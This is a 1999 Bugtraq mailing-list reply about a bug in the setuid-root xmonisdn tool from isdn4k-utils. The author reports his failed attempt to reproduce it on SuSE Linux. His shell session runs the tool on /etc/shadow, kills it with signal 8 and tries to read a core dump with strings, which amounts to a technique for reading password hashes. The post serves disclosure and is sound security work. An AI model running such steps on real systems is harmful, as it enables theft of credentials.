[12288] in bugtraq
Re: xmonisdn (isdn4k-utils/Linux) bug report
daemon@ATHENA.MIT.EDU (Jan-Hendrik Terstegge)
Wed Oct 20 13:50:26 1999
Content-Type: text/plain
Mime-Version: 1.0
Content-Transfer-Encoding: 8bit
Message-Id: <99102013444400.02441@tatooine>
Date: Wed, 20 Oct 1999 13:40:00 +0000
Reply-To: Jan-Hendrik Terstegge <sysadmin@TATOOINE.PING.DE>
From: Jan-Hendrik Terstegge <sysadmin@TATOOINE.PING.DE>
X-To: BUGTRAQ@SECURITYFOCUS.COM
To: BUGTRAQ@SECURITYFOCUS.COM
On Tue, 19 Oct 1999 Ron wrote:
> While playing with xmonisdn (included in the isdn4k-utils package),
> I discovered a little bug. I didn't find anything regarding xmonisdn
> in the Bugtraq archives, so here's a quick post.
> I'm wondering if other xmonisdn users can reproduce this exploit.
> (Tested on my workstation, which is running Red Hat Linux 6.0)
>[... exploit ...]
I tried the exploit on my workstations, running SuSE Linux 6.1 and 6.2 but it
seems as if it was an only RedHat Linux exploit.
This was my try to exploit myself. When I make the 'killall -8 xmonisdn' my
xmonisdn dies only with an Floating exception but it doesn't dump a core.
---snip---
[pts/0@tatooine] /usr/bin > pwd; ls -al xmonisdn
/usr/bin
-rwsr-xr-x 1 root root 15340 Jul 23 01:20 xmonisdn
[pts/0@tatooine] /usr/bin > xmonisdn -file /etc/shadow
[1] + Stopped xmonisdn -file /etc/shadow
[pts/0@tatooine] /usr/bin > bg
[1] xmonisdn -file /etc/shadow &
[pts/0@tatooine] /usr/bin > killall -8 xmonisdn
[1] Floating exception xmonisdn -file /etc/shadow
[pts/0@tatooine] /usr/bin > strings core |less
strings: core: File or Directory not found
---snip---
--
Jan-Hendrik Terstegge
<sysadmin@tatooine.ping.de>
